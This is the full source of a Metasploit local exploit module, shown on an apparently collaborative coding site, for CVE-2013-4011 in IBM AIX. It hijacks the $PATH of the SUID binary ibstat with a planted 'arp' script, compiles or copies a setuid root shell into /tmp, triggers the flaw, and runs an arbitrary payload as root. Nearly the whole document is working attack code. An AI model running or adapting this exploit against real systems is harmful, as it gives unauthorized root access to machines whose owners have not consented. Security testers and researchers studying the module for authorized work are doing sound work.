Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Exploit::FileDropper
11
  prepend Msf::Exploit::Remote::AutoCheck
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'ibstat $PATH Privilege Escalation',
18
        'Description' => %q{
19
          This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".
20
        },
21
        'Author' => [
22
          'Kristian Erik Hermansen', # original author
23
          'Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>', # Metasploit module
24
          'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>' # Metasploit module
25
        ],
26
        'References' => [
27
          ['CVE', '2013-4011'],
28
          ['OSVDB', '95420'],
29
          ['BID', '61287'],
30
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827'],
31
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756']
32
        ],
33
        'Platform' => %w[unix aix],
34
        'Arch' => ARCH_CMD,
35
        'Payload' => {
36
          'Compat' => {
37
            'PayloadType' => 'cmd',
38
            'RequiredCmd' => 'perl'
39
          }
40
        },
41
        'SessionTypes' => %w[shell],
42
        'Targets' => [
43
          ['IBM AIX Version 6.1', {}],
44
          ['IBM AIX Version 7.1', {}]
45
        ],
46
        'DefaultTarget' => 1,
47
        'DisclosureDate' => '2013-09-24',
48
        'Notes' => {
49
          'Stability' => [CRASH_SAFE],
50
          'Reliability' => [REPEATABLE_SESSION],
51
          'SideEffects' => [ARTIFACTS_ON_DISK]
52
        }
53
      )
54
    )
55

56
    register_options([
57
      OptString.new('IBSTAT_PATH', [true, 'Path to ibstat executable', '/usr/bin/ibstat'])
58
    ])
59
    register_advanced_options([
60
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
61
    ])
62
  end
63

64
  def ibstat_path
65
    datastore['IBSTAT_PATH']
66
  end
67

68
  def check
69
    find_output = cmd_exec('find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null')
70

71
    return CheckCode::Safe("#{ibstat_path} is not set-uid root") unless find_output.to_s.include?('ibstat')
72

73
    CheckCode::Appears("#{ibstat_path} is set-uid root")
74
  end
75

76
  def exploit
77
    root_file = "#{datastore['WritableDir']}/#{rand_text_alpha(8)}"
78
    arp_file = "#{datastore['WritableDir']}/arp"
79
    c_file = %^#include <stdio.h>
80

81
int main()
82
{
83
   setreuid(0,0);
84
   setregid(0,0);
85
   execve("/bin/sh",NULL,NULL);
86
   return 0;
87
}
88
^
89
    arp = %(#!/bin/sh
90

91
chown root #{root_file}
92
chmod 4555 #{root_file}
93
)
94

95
    if gcc_installed?
96
      print_status("Dropping file #{root_file}.c...")
97
      write_file("#{root_file}.c", c_file)
98

99
      print_status('Compiling source...')
100
      cmd_exec("gcc -o #{root_file} #{root_file}.c")
101
      print_status('Compilation completed')
102

103
      register_file_for_cleanup("#{root_file}.c")
104
    else
105
      cmd_exec("cp /bin/sh #{root_file}")
106
    end
107

108
    register_file_for_cleanup(root_file)
109

110
    print_status('Writing custom arp file...')
111
    write_file(arp_file, arp)
112
    register_file_for_cleanup(arp_file)
113
    cmd_exec("chmod 0555 #{arp_file}")
114
    print_status('Custom arp file written')
115

116
    print_status('Updating $PATH environment variable...')
117
    path_env = cmd_exec('echo $PATH')
118
    cmd_exec("PATH=#{datastore['WritableDir']}:$PATH")
119
    cmd_exec('export PATH')
120

121
    print_status('Finding interface name...')
122
    iface = ''
123
    cmd_exec('lsdev -Cc if').each_line do |line|
124
      next unless line.match(/^[a-z]+[0-9]+\s+Available/) && !line.match(/^lo[0-9]/)
125

126
      iface = line.split(/\s+/)[0]
127
      print_status("Found interface #{iface}.")
128
      break
129
    end
130

131
    if iface == ''
132
      iface = 'en0'
133
      print_status('Found no interface, defaulting to en0.')
134
    end
135

136
    print_status('Triggering vulnerablity...')
137
    cmd_exec("#{ibstat_path} -a -i #{iface} 2>/dev/null >/dev/null")
138

139
    # The $PATH variable must be restored before the payload is executed
140
    # in cases where an euid root shell was gained
141
    print_status('Restoring $PATH environment variable...')
142
    cmd_exec("PATH=#{path_env}")
143
    cmd_exec('export PATH')
144

145
    cmd_exec(root_file)
146
    print_status('Checking root privileges...')
147

148
    if is_root?
149
      print_status('Executing payload...')
150
      cmd_exec(payload.encoded)
151
    end
152
  end
153

154
  def gcc_installed?
155
    print_status('Checking if gcc exists...')
156
    gcc_whereis_output = cmd_exec('whereis -b gcc')
157

158
    if gcc_whereis_output.to_s.include?('/')
159
      print_good('gcc found!')
160
      return true
161
    end
162

163
    print_status('gcc not found. Using /bin/sh from local system')
164
    false
165
  end
166

167
  def is_root?
168
    id_output = cmd_exec('id')
169

170
    if id_output.include?('euid=0(root)')
171
      print_good('Got root! (euid)')
172
      return true
173
    end
174

175
    if id_output.include?('uid=0(root)')
176
      print_good('Got root!')
177
      return true
178
    end
179

180
    print_error('Exploit failed')
181
    false
182
  end
183
end
184

185